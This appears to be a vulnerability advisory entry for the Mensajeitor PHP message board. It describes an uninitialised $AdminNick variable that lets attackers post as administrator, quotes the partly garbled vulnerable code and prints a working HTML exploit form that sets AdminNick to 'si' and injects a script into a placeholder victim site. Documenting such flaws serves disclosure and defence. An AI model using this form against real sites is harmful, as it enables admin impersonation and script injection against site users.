 |
|
|
|
|
|
|
|
|
|
| Vulnerability details : |
| |
 |
|
Mensajeitor Code Injection Admin Spoof |
|
|
Fiche créée le 2004-07-21 12:05:35, dernière mise à jour le 2008-03-02 23:48:46
Mensajeitor contains a flaw that will allow an attacker to post a message as an adminstrator. The problem is that there is no default value for the $AdminNick variable in mensajeitor.php causing checks to this variable to potentially be bypassed allowing an attacker to impersonate the administrator and post messages with higher privilegies.
Vulnerable code:
for($i=0;$i".$nick."";
$AdminNick = "si";
}
}
if ($AdminNick != "si") {
$cadena_final .= "$nick";
}
As can be seen in the previous code, the default value for $AdminNick is not given, and if both checks fails no value is set by the code. This allows a remote attacker to set himself as part of the admin group by simply providing a default value for the $AdminNick parameter. This opens up the product to different types of attack, one of them is HTML and code injection attacks.
Exploit code:
< html>
< head>< title>Mensajeitor Exploit
< body>
Inyeccion codigo en Mensajeitor =< v1.8.9 r1< br>< br>
< form name="form1" method="post" action="http://www.victima.com/mensajeitor.php">
< input type="text" name="nick" size="10" value="Nick" maxlength="9">< br>
< input type="text" name="titulo" size="21" value="Mensaje">< br>
< input type="text" name="url" size="21" value="http://">< br>
< input type="hidden" name="AdminNick" value="si">< br>
Introduce codigo a insertar ( | debe incluirse al principio)< br>
< input type="text" name="cadena_final" size="75%" value=" | < script>alert('hacked ;)')">< br>
< input type="submit" name="enviar" value="Enviar" class="form">< br>
MensajeitorPHP propiedad de aaff.< br>
By Jordi Corrales (Shell Security Group, http://www.shellsec.net)
|
